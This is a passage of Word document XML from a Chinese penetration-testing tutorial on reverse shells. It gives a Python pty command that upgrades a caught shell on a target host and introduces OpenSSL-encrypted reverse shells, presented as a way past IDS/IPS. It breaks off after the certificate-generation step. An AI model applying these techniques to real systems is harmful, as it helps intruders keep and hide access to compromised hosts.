        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="000202D6">
        <w:t>f raw</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="52F99CDB" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="12E984FD" w14:textId="18CC7107" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6">
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>将这一句话放在主机上执行即可</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3235D6B4" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="0C1651FB" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>后获取模拟终端</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F53B7F7" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:r w:rsidRPr="00AD1C79">
        <w:t>其实，上面所讲的各种方法获取的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>都不是一个标准的虚拟终端环境，它仅仅是一个标准输入。你会发现存在一个问题，就是即使我们获取了目标虚拟终端控制权限，但是往往会发现其交互性非常的差，回显信息与可交互性非常的差和不稳定，具体见情况有以下几个种。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59C557E5" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>获取的虚拟终端没有交互性，我们想给添加的账号设置密码或执行</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>sudo</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>等命令，无法完成。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="02C9CBE1" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>标准的错误输出无法显示，无法正常使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>vim</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>等文本编辑器等。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="129F287E" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="54"/>
        </w:numPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>获取的目标主机的虚拟终端使用非常不稳定，很容易断开连接。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3492F398" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="00AD1C79" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="4656CBD2" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:r w:rsidRPr="00AD1C79">
        <w:t>这往往都是因为我们获取的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>并不是标准的虚拟终端，为了能够完成输入密码等操作，我们必须模拟一个真正的终端设备。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0AD61C39" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:r w:rsidRPr="00AD1C79">
        <w:t>我们其实可以借助于</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>python</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>默认包含的一个</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>pty</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>标准库来获取一个标准的虚拟终端环境。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>Python</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>在现在一般发行版</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>Linux</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>系统中都会自带，所以使用起来也较为方便，即使没有安装，我们手动安装也很方便。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="53055D85" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:r w:rsidRPr="00AD1C79">
        <w:t>我们只需在获取的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>里面输入如下命令，即可模拟一个终端设备：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0FE1949B" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">python </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>c "import pty;pty.spawn('/bin/bash')"</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0C2DA19F" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="00AD1C79" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="60958124" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:pStyle w:val="3"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>OpenSSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>反弹加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="62882B93" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:r w:rsidRPr="00AD1C79">
        <w:t>在上文中，我们总结了很多反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>得方法，但是我发现这种反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>方式都有一个缺点，那就是</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>所有的流量都是明文传输的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>。这些通过</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>通过传输的流量都可以被管理员直接抓取并理解，当目标主机网络环境存在网络防御检测系统时（</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>IDS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>、</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>IPS</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>等），网络防御检测系统会获取到我们的通信内容并进行告警和阻止。因此，我们需要对通信的内容进行混淆或加密，这时可以选择使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> OpenSSL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>反弹一个加密的</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> shell</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="59B33099" w14:textId="77777777" w:rsidR="000202D6" w:rsidRPr="00AD1C79" w:rsidRDefault="000202D6" w:rsidP="000202D6"/>
    <w:p w14:paraId="11E92771" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve">OpenSSL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>简介</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="389ACD87" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>在计算机网络上，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">OpenSSL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>是一个开放源代码的软件库包，应用程序可以使用这个包来进</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:lastRenderedPageBreak/>
        <w:t>行安全通信，避免窃听，同时确认另一端连接者的身份。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="25CB85B7" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>协议要求建立在可靠的传输层协议</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>(TCP)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>之上。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>协议的优势在于它是与应用层协议独立无关的，高层的应用层协议</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>(</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>例如：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>HTTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>FTP</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>，</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>TELNET</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>等</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>)</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>能透明地建立于</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>协议之上。</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>SSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>协议在应用层协议通信之前就已经完成加密算法、通信密钥的协商及服务器认证工作。在此之后应用层协议所传送的数据都会被加密，从而保证通信的私密性。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0BD596E0" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>在利用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> OpenSSL </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>反弹</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> shell </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>之前需要先生成自签名证书：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="04C123FE" w14:textId="77777777" w:rsidR="008D731C" w:rsidRDefault="008D731C" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C09B73D" w14:textId="235B6868" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">openssl req </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">x509 </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>newkey rsa</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>:2048</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>keyout key</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">pem </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>out cert</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">pem </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve">days </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>365</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="070F5B95" w14:textId="77777777" w:rsidR="000202D6" w:rsidRDefault="000202D6" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="78534445" w14:textId="0AFBFBA5" w:rsidR="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>这个</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>过期了证书就失效了，没法续订，但是你可以指定生成一个非常大的</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>days</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>的数字，如</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>1000</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>或者</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>3650</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>（十年），但是客户端通常只认一两年的，这么大的过期数字没法用，这是实际的限制</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6EA41F24" w14:textId="77777777" w:rsidR="007B0AE8" w:rsidRDefault="007B0AE8" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="4FF564C1" w14:textId="7A282209" w:rsidR="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:t>openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 10000 -nodes</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3ED2EC82" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00AD1C79" w:rsidRDefault="00FE0976" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="7FA69A2A" w14:textId="3CB7D07F" w:rsidR="001C2A5E" w:rsidRDefault="001C2A5E" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>key</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是私钥，</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>cert</w:t>
      </w:r>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>是公钥</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1BAF2A59" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="00FE0976">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:t>各参数的作用如下：</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="29F85CE5" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="00FE0976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>req</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>表示创建和处理证书请求。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="38107863" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="00FE0976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-x509</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>表示生成自签名证书，而不是证书签名请求（</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>CSR</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>）。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AE73478" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="00FE0976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-newkey rsa:2048</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>生成一个新的</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve"> RSA </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>私钥，并指定密钥长度为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve"> 2048 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>位。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="42D4DCE0" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="00FE0976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-keyout key.pem</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>指定私钥文件的输出路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B2A4BD2" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="00FE0976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-out cert.pem</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>指定生成的证书文件的输出路径。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="20ABBE50" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="00FE0976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-days 365</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>证书的有效期为</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve"> 365 </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>天。</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="77B0C2D3" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="00FE0976">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="57"/>
        </w:numPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00FE0976">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>-nodes</w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:r w:rsidRPr="00FE0976">
        <w:t>表示生成的私钥不加密（即不要求输入密码）</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="755D8BC5" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRPr="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="33019B9C" w14:textId="77777777" w:rsidR="00FE0976" w:rsidRDefault="00FE0976" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="56CC14C7" w14:textId="231F37A6" w:rsidR="000202D6" w:rsidRDefault="00AD1C79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:hint="eastAsia"/>
        </w:rPr>
        <w:t>生成自签名证书会提示输入证书信息，懒得写可以一路回车</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71E41262" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="009222EB">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="1C72D15A" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:pStyle w:val="4"/>
        <w:rPr>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>使用</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>OpenSSL</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>反弹加密</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:rPr>
          <w:bCs/>
        </w:rPr>
        <w:t>shell</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7BD61DC4" w14:textId="77777777" w:rsidR="00AD1C79" w:rsidRPr="00AD1C79" w:rsidRDefault="00AD1C79" w:rsidP="00AD1C79">
      <w:pPr>
        <w:jc w:val="left"/>
      </w:pPr>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>实验环境：</w:t>
      </w:r>
      <w:r w:rsidRPr="00AD1C79">
        <w:t>Linux</w:t>
      </w:r>
    </w:p>
